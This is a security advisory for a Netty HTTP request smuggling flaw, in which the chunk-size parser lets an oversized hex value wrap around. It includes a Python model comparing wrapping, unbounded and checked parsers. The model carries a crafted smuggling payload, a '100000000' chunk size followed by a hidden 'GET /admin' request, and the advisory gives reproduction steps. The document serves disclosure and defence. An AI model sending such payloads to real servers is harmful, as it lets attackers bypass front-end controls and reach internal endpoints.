Netty
cpe:2.3:a:netty:netty:*:*:*:*:*:*:*, +1 more
- <= 4.2.12.Final
- <= 4.1.132.Final
A vulnerability in Netty's HTTP codec prior to versions 4.2.13.Final and 4.1.133.Final allows HTTP request smuggling. The chunk-size parser in 'HttpObjectDecoder' accumulates the hexadecimal chunk-size digits of a chunked transfer encoding into an int without checking for overflow, so an oversized hex value silently wraps instead of being rejected. An attacker can craft a chunk-size line that wraps to a value such as zero, so that Netty ends the message body at a point where a correctly parsing peer (a front-end proxy, for example) does not; the bytes that follow are then parsed by Netty as the start of a new, attacker-supplied HTTP request.
Exploitation results in HTTP request smuggling: an attacker can inject arbitrary HTTP requests that the server processes, potentially bypassing front-end controls that never saw those requests.
To reproduce, send a chunked HTTP request whose chunk-size line is large enough to overflow the int accumulator. The vulnerable Netty server parses the request incorrectly and treats the data after the wrapped chunk as a second, smuggled request. A patched server rejects the oversized chunk size instead.
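The following model shows the parser disagreement described above. It is an added example, not Netty's own code: the unchecked parser mirrors the described 'result = result * 16 + digit' accumulation into a 32-bit signed int, the checked parser shows the kind of bound that prevents the wrap, and an unbounded parser stands in for a front end that parses the size correctly. The request bytes, the function names and the exact error strings are constructed for this illustration.

```python
"""Model of the chunk-size overflow behind the Netty advisory (added example,
not Netty code). Three hex chunk-size parsers are run over the same bytes to
show how an overflowing parser ends the body early and exposes a second,
smuggled request."""
from itertools import takewhile

UINT32 = 1 << 32
INT32_MAX = (1 << 31) - 1


def hex_nibble(b: int) -> int:
    """Value of one ASCII hex digit, or -1 if the byte is not a hex digit."""
    if 0x30 <= b <= 0x39:
        return b - 0x30
    if 0x41 <= b <= 0x46:
        return b - 0x41 + 10
    if 0x61 <= b <= 0x66:
        return b - 0x61 + 10
    return -1


def chunk_size_wrapping(line: bytes) -> int:
    """Model of the unchecked parser: accumulate into a 32-bit signed int with
    'result = result * 16 + digit' and no overflow check, so the value wraps
    silently (wrap modelled explicitly because Python ints are unbounded).
    Parsing stops at ';' (chunk extension), whitespace or CR."""
    result = 0
    for b in line:
        digit = hex_nibble(b)
        if digit == -1:
            break
        result = (result * 16 + digit) % UINT32
    return result - UINT32 if result > INT32_MAX else result


def chunk_size_checked(line: bytes) -> int:
    """Hardened parser (assumed shape of a fix): refuse the digit that would
    push the accumulator past INT32_MAX, so no wrap can occur."""
    result = 0
    seen = False
    for b in line:
        digit = hex_nibble(b)
        if digit == -1:
            break
        seen = True
        if result > (INT32_MAX - digit) // 16:  # result * 16 + digit > INT32_MAX
            raise ValueError("chunk size too large")
        result = result * 16 + digit
    if not seen:
        raise ValueError("missing chunk size")
    return result


def chunk_size_unbounded(line: bytes) -> int:
    """Reference: what a peer with an unbounded (or 64-bit) size sees."""
    digits = bytes(takewhile(lambda b: hex_nibble(b) != -1, line))
    return int(digits, 16)  # raises ValueError on an empty size field


def decode_chunked(stream: bytes, parse_size) -> tuple[bytes, bytes]:
    """Decode one chunked body (no trailers) with the given size parser.
    Returns (body, leftover); leftover is what the decoder would treat as the
    start of the next request. Raises ValueError if it needs more data."""
    body = bytearray()
    pos = 0
    while True:
        eol = stream.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("need more data")
        size = parse_size(stream[pos:eol])
        if size < 0:
            raise ValueError("negative chunk size")
        pos = eol + 2
        if size == 0:  # last-chunk: body ends here
            if stream[pos:pos + 2] != b"\r\n":
                raise ValueError("trailers not supported in this model")
            return bytes(body), stream[pos + 2:]
        if pos + size + 2 > len(stream):
            raise ValueError("need more data")
        body += stream[pos:pos + size]
        if stream[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("missing chunk terminator")
        pos += size + 2


def outcome(stream: bytes, parse_size):
    """Summarise what one decoder does with the stream: a complete message
    plus leftover bytes, or the error it raised."""
    try:
        body, rest = decode_chunked(stream, parse_size)
    except ValueError as exc:
        return ("error", str(exc))
    return ("message", body, rest)


# Constructed request body: nine hex digits give 0x100000000, which wraps to 0
# in a 32-bit int, so the wrapping decoder sees an immediate last-chunk and
# parses the bytes after it as a new request. ("80000000" would wrap negative.)
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: internal\r\n\r\n"
CRAFTED = b"100000000\r\n\r\n" + SMUGGLED

if __name__ == "__main__":
    for name, parser in (("wrapping", chunk_size_wrapping),
                         ("unbounded", chunk_size_unbounded),
                         ("checked", chunk_size_checked)):
        print(f"{name:9}: {outcome(CRAFTED, parser)}")
```

Running the script prints three different outcomes for the same bytes: the wrapping decoder returns an empty body and hands the 'GET /admin' bytes on as the next request, the unbounded decoder is still waiting for a 4 GiB chunk (so a front end with that view would forward everything as one request body), and the checked decoder rejects the size line outright, which is the behaviour to expect from a patched server.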
Users should upgrade to Netty 4.2.13.Final or 4.1.133.Final (or later). Until then, the exposure is greatest where Netty sits behind a proxy or load balancer that parses chunk sizes correctly, since that parsing difference is what the smuggled request relies on.